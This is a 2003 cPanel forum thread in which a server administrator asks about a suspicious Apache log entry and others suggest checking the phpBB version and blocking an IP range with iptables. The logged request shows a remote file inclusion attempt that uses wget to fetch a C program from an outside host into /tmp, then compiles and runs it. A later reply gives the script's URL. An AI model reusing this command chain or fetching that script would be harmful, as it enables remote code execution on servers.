The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

suspecious activity on the server

Discussion in 'General Discussion' started by simonlee, Nov 23, 2003.

  1. simonlee

    simonlee Active Member

    Joined:
    Jan 19, 2003
    Messages:
    37
    Likes Received:
    0
    Trophy Points:
    6
    I'v found this in the Apache access log:
    201.2.211.246 - - [23/Nov/2003:04:06:29 +1100] "GET /phpBB/templates/subSilver/s
    houtbox/expanded.php?conf=http://xfteam.net/cmd.txt&cmd=uname%20-a;cd%20/tmp;wge
    t%20http://www10.brinkster.com/canalforbid/fedor.txt;mv?&cmd=uname%20-a;echo%20X
    FTEAM;cd%20/tmp;wget%20http://www10.brinkster.com/canalforbid/fedor.txt;mv fedor
    .txt fedor.c;gcc -o f fedor.c;./f HTTP/1.0" 400 375

    and .c file in /tmp

    Fortunately, I'v disabled C compiler on the server.
    Is that somebody was trying to use holes in phpBB to hack in the server?
    Can somebody advise how to prevent such activites?
     
  2. markie

    markie BANNED

    Joined:
    Oct 5, 2003
    Messages:
    143
    Likes Received:
    0
    Trophy Points:
    0
    What version of Phpbb is this? I recently saw something like this on a Cobalt server where they did the same thing except is was done through an php pgm.
     
  3. simonlee

    simonlee Active Member

    Joined:
    Jan 19, 2003
    Messages:
    37
    Likes Received:
    0
    Trophy Points:
    6
    phpBB 2.0.6, any advice?
     
  4. markie

    markie BANNED

    Joined:
    Oct 5, 2003
    Messages:
    143
    Likes Received:
    0
    Trophy Points:
    0
    Are you sure about that? I know 2.0.4 was vulnarable to this and people were advised to upgrade. We told all our users to upgrade immediately. I would post this on their forums and find out if anyone else has reported this. I am not aware of a hole like this in version 2.0.6, at least we have not seen any security posts about this version. Please contact PhpBB and find out if anyone else has reported this. If 2.0.6 is vuln then we have some major security issues on our servers as well due to the fact that we have a few hundred sites running it.
     
  5. simonlee

    simonlee Active Member

    Joined:
    Jan 19, 2003
    Messages:
    37
    Likes Received:
    0
    Trophy Points:
    6
    Okay, I will go to phpBB forum.
    Yes, I am sure, because the board comes with cPanel, and we have already upgraded our cPanel to the latest released version:8.5.4-R7

    Thank you markie!
     
  6. markie

    markie BANNED

    Joined:
    Oct 5, 2003
    Messages:
    143
    Likes Received:
    0
    Trophy Points:
    0
    Well let us know what phpbb says about 2.0.6.
     
  7. RaveKnights

    RaveKnights Well-Known Member

    Joined:
    Nov 5, 2003
    Messages:
    81
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Some Where Out There!
    Here's the script they had tried to use http://www10.brinkster.com/canalforbid/fedor.txt

    Here are their IP's you might want to REJECT from iptables if you use it.

    66.70.10.0
    66.70.10.255

    66.70.10.0/24

    quick iptables code to enter below:

    iptables -A INPUT -s 66.70.10.0/24 -j REJECT
     
Loading...

Share This Page